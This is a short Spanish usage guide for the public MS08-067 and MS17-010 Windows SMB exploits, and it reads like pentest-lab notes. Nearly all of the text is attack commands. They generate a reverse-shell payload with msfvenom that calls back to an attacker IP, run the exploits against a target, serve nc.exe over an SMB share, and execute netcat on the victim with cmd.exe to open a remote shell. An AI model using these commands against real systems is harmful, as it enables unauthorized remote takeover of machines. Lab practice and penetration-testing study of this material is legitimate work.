Uso:
- Generar reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.157 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -a x86 --platform windows -v shellcode- Modificar la variable
shellcode(línea 54) con el resultado de msfvenom - Dejar a la escucha el puerto seleccionado
nc -lnvp 443- Ejecutamos el exploit indicando el número de OS y el puerto (el autor recomienda usar el siguiente comando de nmap para validar el OS:
nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1)1para Windows XP SP0/SP1 Universal2para Windows 2000 Universal3para Windows 2003 SP0 Universal4para Windows 2003 SP1 English5para Windows XP SP3 French (NX)6para Windows XP SP3 English (NX)7para Windows XP SP3 English (AlwaysOn NX)
python3 ms08-067.py 192.168.1.1 6 445Uso:
- Es necesario tener ambos códigos (ms17-010.py y mysmb.py) en el mismo directorio
- Ejecutamos el exploit
python3 ms17-010.py 192.168.1.1- Debido que la shell generada no es muy estable, se recomienda generar una nueva shell usando netcat
- Levantamos una carpeta compartida
python3 /usr/share/doc/python3-impacket/examples/smbserver.py tmp /usr/share/windows-binaries/- Nos ponemos a la escucha
nc -lnvp 443- Ejecutamos netcat en la máquina víctima
\\10.11.0.157\tmp\nc.exe 10.11.0.157 443 -e cmd.exe